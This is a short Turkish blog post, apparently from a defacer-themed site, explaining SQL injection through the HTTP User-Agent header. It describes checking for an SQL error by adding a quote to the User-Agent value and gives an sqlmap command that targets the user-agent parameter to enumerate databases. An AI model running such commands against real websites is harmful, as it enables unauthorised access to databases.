USER-AGENT İLE SQL INJECTİON USER-AGENT İLE SQL INJECTİON USER-AGENT İLE SQL INJECTİON USER-AGENT İLE SQL INJECTİON - Scorpiol

USER-AGENT İLE SQL INJECTİON

USER-AGENT İLE SQL INJECTİON

Kullandığımız internet tarayıcılarının tümü içerisinde bir User Agent, yani kod dizgisi/string barındırır. Bu kod dizgisi yardımıyla bağlanmaya çalıştığımız web sunucusu tıpkı IP adresimizde olduğu gibi bizim hangi tarayıcıyı ve hangi işletim sistemini kullandığımızı öğrenir. User Agent’lar genellikle web sitesi sahipleri tarafından bir sitenin iyileştirme çalışmaları için kullanılabilir.

tamper data ile request verilerini görüyoruz


User-Agent sonuna ‘ atarak sql hatası varmı ona bakcaz


ve sql hatası aldık şimdi sqlmap ile bir saldırı yapcaz


sqlmap.py -u https://scorpioldefacer.blogspot.com/sql.php –cookie=”xxx” –user-agent”xxxx” -p “user-agent” –dbs


0 Yorumlar

Yorum Gönder

Yorum Gönder (0)

Daha yeni Daha eski
Oxygen Chrome